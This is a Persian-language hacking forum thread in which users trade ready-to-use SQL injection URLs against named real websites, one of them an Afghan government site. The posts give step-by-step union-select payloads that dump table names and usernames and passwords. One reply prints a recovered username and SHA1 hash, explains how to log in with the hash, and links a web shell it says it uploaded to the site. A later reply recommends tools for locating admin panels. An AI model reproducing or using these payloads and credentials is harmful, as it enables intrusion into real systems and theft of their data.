472 ارسال در این موضوع قرار دارد

  Get All The Tables and Columns

http://www.arma.com.sa/news.php?id=-12%27+union%20select%201,2,(select%20(@)%20from%20(select(@:=0x00),(select%20(@)%20from%20(information_schema.columns)%20where%20(table_schema%3E=@)%20and%20(@)in%20(@:=concat(@,0x3C,0x62,0x72,0x3E,0x3c666f6e7420636f6c6f723d626c75653e,table_name,0x3c2f666f6e743e,%27%20%3E%20%27,0x3c666f6e7420636f6c6f723d7265643e,column_name,0x3c2f666f6e743e))))x),4,5,6,7,8,9,10--+

 

 

Show All The usernames And passwords In The owners Table

http://www.arma.com.sa/news.php?id=-12%27+union%20all%20select%201,0x3c666f6e7420636f6c6f723d22726564222073697a653d222b32223e3c63656e7465723e496e6a65637465642042792050302173306e43306433203c2f63656e7465723e3c2f666f6e743e3c62723e,(select%20(@)%20from%20(select(@:=0x00),(select%20(@)%20from%20(owners)%20where%20(@)in%20(@:=concat(@,0x3C,0x62,0x72,0x3E,0x3c62723e,0x3c623e,0x3c666f6e7420636f6c6f723d7265643e,0x557365726e616d65203a20,0x3c2f623e,0x3c2f666f6e743e,0x3c666f6e7420636f6c6f723d677265656e3e,username,%200x3c62723e,0x3c666f6e7420636f6c6f723d626c75653e,0x3c623e,0x50617373776f7264203a20,0x3c2f623e,0x3c2f666f6e743e,password))))x),4,5,6,7,8,9,10--+

 

 

  :  Administrator Panel

http://www.arma.com.sa/admin/index.php

 

 

Possible Type of hash : MD5

به اشتراک گذاری این ارسال


لینک به ارسال
به اشتراک گذاری در سایت های دیگر
در در 1397/06/04, 09:56:24، yavar24 گفته است :

از دوستان کسی میتونه زحمت اینو بکشه و ای دی و پسورد بهمراه لاگین پیج رو میخوام

https://arazi.gov.af/

سلام دوست عزیز 

این تارگت، تارگت راحتی و کار خاصی نداره مراحل رو یکی یکی به دقت نگاه کن 

:  step 1

http://arazi.gov.af/dari/mosawabat/moswabatdetails.php?id=-37+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11--+

 

:  step 2

http://arazi.gov.af/dari/mosawabat/moswabatdetails.php?id=-37+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,group_concat(table_name),11+from+information_schema.tables+where+table_schema=database()--+

 

:  step 3

http://arazi.gov.af/dari/mosawabat/moswabatdetails.php?id=-37+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,group_concat(user_name,0x3c62723e,password),11+from+user_login--+

 

 

استفاده از روش سریعتر 

:  step 1

http://arazi.gov.af/dari/mosawabat/moswabatdetails.php?id=-37+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,(select (@) from (select(@:=0x00),(select (@) from (information_schema.columns) where (table_schema>=@) and (@)in (@:=concat(@,0x3C,0x62,0x72,0x3E,0x3c666f6e7420636f6c6f723d626c75653e,table_name,0x3c2f666f6e743e,' > ',0x3c666f6e7420636f6c6f723d7265643e,column_name,0x3c2f666f6e743e))))x),11--+

 

:  step 2

http://arazi.gov.af/dari/mosawabat/moswabatdetails.php?id=-37+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,0x3c666f6e7420636f6c6f723d22726564222073697a653d222b32223e3c63656e7465723e496e6a65637465642042792050302173306e43306433203c2f63656e7465723e3c2f666f6e743e3c62723e,(select (@) from (select(@:=0x00),(select (@) from (user_login) where (@)in (@:=concat(@,0x3C,0x62,0x72,0x3E,0x3c62723e,0x3c623e,0x3c666f6e7420636f6c6f723d7265643e,0x557365726e616d65203a20,0x3c2f623e,0x3c2f666f6e743e,0x3c666f6e7420636f6c6f723d677265656e3e,user_name, 0x3c62723e,0x3c666f6e7420636f6c6f723d7265643e,0x3c623e,0x50617373776f7264203a20,0x3c2f623e,0x3c2f666f6e743e,password))))x),11--

 

 

خب تا اینجای کار 


Username : media
Password : d033e22ae348aeb5660fc2140aec35850c4da997

 

 Admin Page

https://arazi.gov.af/login.php

 

یه نکته رو بگم این پسورد با استفاده از الگوریتم SHA1 هش شده که اگر Decrypt بشه معادل admin به دست میاد که درواقع admin رمز عبور نیست باید پسورد رو به صورت Hash شده وارد کنید.

 

در آخر هم یک شل براتون آپلود کردم

https://arazi.gov.af/img/ALFAV2.php

 

موفق باشید.

به اشتراک گذاری این ارسال


لینک به ارسال
به اشتراک گذاری در سایت های دیگر
در 12 ساعت قبل، rezasarwary گفته است :

سلام من در پیدا کردن پنل ادمین مشکل دارم سایت هارو یوزر پسوردشو پیدا میکنم ولی پنل ادمین رو نه مثل این سایت:http://www.c2-int.com

به جای اسپم در تاپیک اصلی سوالات خود رو در این بخش مطرح کنید دفعه بعد اخطار داده میشه :

سوال و جواب های نفوذ به سایت ها و سرورها و روشهای مقابله

 

برای پیدا کردن صفحه ادمین از ابزار jSQL در کالی لینوکس

و نرم افزار هویج در ویندوز استفاده کنید ؛

هر دو ابزار با استفاده از لیست پیش فرض خود از صفحه ادمین CMS های مختلف و اسکن سایت سعی در بدست اوردن صفحه ادمین میکنند .

به اشتراک گذاری این ارسال


لینک به ارسال
به اشتراک گذاری در سایت های دیگر

برای ارسال دیدگاه یک حساب کاربری ایجاد کنید یا وارد حساب خود شوید

برای اینکه بتوانید دیدگاهی ارسال کنید نیاز دارید که کاربر سایت شوید

ایجاد یک حساب کاربری

برای حساب کاربری جدید در سایت ما ثبت نام کنید. عضویت خیلی ساده است !

ثبت نام یک حساب کاربری جدید

ورود به حساب کاربری

دارای حساب کاربری هستید؟ از اینجا وارد شوید

ورود به حساب کاربری